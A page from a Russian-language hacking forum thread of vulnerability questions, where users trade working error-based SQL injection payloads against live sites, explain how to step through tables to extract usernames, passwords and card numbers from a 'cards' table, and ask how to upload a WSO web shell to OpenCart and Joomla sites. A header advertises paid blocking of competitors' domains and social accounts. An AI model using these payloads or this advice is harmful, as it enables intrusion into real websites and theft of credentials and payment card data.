УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2280 из 2438

2280

Опции темы

Поиск в этой теме

Опции просмотра

#22791

03.10.2013, 21:10

Inoms

Guest

Сообщений: n/a

Провел на форуме:
23349

Репутация: 45

Цитата:

Сообщение от zombak18

zombak18 said:

неа(
ах да либо запрос на загрузку шелла тоже вариант)

Всё, что идёт перед select+count.. должно быть или после юниона, или в скобках после какого-либо оператора(or,and т.д) и желательно с row().

Как уже говорили, апострофы фильтруются, без них и без полного пути к каталогу с сайтом, шелл не реально залить)

#22792

03.10.2013, 21:15

zombak18

Guest

Сообщений: n/a

Провел на форуме:
12404

Репутация: 0

Цитата:

Сообщение от Inoms

Inoms said:
Всё, что идёт после select+count.. должно быть или после юниона, или в скобках после какого-либо оператора(or,and т.д) и желательно с row().
Как уже говорили, апострофы фильтруются, без них и без полного пути к каталогу с сайтом, шелл не реально залить)

лс глянь.. сайтик кинул

у меня уже не варит

при

Цитата:

Сообщение от None

union select+count(*),concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x

пишет

#22793

03.10.2013, 21:59

wx0

Guest

Сообщений: n/a

Провел на форуме:
1630

Репутация: 0

Обычно эта ошибка от неправильного запроса, нужно для начала найти точку опорную без ошибки и постепенно менять запрос. Есть разные тулзы для такого, но если надо в ручную, могу помочь подобрать запрос если это будет возможно. Если что в лс

#22794

03.10.2013, 22:03

Inoms

Guest

Сообщений: n/a

Провел на форуме:
23349

Репутация: 45

Юнион там без полезен, он ничего не отображает, работает только по ошибкам всё.

ЗЫ: union select+1,2,3,4,count(*),concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x -- t

#22795

03.10.2013, 22:39

zombak18

Guest

Сообщений: n/a

Провел на форуме:
12404

Репутация: 0

Цитата:

Сообщение от Inoms

Inoms said:
Юнион там без полезен, он ничего не отображает, работает только по ошибкам всё.
ЗЫ: union select+1,2,3,4,count(*),concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x -- t

#22796

03.10.2013, 22:55

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от zombak18

zombak18 said:

cards - первая таблица, так как limit n,1, где n=0

дальше перебирай с помощью лимита, n=n+1

UPD

смотри

Вот это запрос на выборку данных (usernameи password) из таблицы user. (то, что в области с красной границей, это и есть данные вида usernameassword).

Для перебора используем лимит(то, что в области с желтой границей).

#22797

04.10.2013, 13:54

aivi

Новичок

Регистрация: 18.04.2010

Сообщений: 0

Провел на форуме:
120

Репутация: 0

Всем доброго времени суток, подскажите как узнать имя залитого файла. залил шелл формата wso2.php.jpg

Движок на который заливал OpenCart

#22798

04.10.2013, 14:44

zombak18

Guest

Сообщений: n/a

Провел на форуме:
12404

Репутация: 0

Подскажите..

Как из запроса

Цитата:

Сообщение от None

or(select 11 from information_schema.tables group by concat((select card from card.cards limit 1,1),0x3b,version(),floor(rand(0)*2)) having count(*)) -- t

сделать запрос по получению всех таблиц или столбцов из таблицы Cards

#22799

04.10.2013, 14:59

psihoz26

Guest

Сообщений: n/a

Провел на форуме:
182660

Репутация: 324

Код:

Code:
$result = mysql_query("SELECT * FROM profiles where login = '$username' and sa = '$otvet_na_vopros' and sq = '$u2'") or die("niiiii");

тут только в слепую крутить получается через benchmark

в других же случаях выдает niiiii =\

подскажите как ещё попробовать??

#22800

04.10.2013, 16:24

mmx2012

Guest

Сообщений: n/a

Провел на форуме:
300

Репутация: 0

Приветствую!

Дано: joomla 2.5.x, читалка файлов (через скрипт с file_get_contents), одна слепая скуля и в результате нее (сбрутил пароль из users) доступ в админку джумлы с правами редактора. Вопрос: как залить шелл? Нифига не получается - уже голову всю сломал. Через png с прицепленым к концу wso shell не получается, да и file_priv = N, соответственно через INTO OUTFILE тоже мимо

Страница 2280 из 2438

2280

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход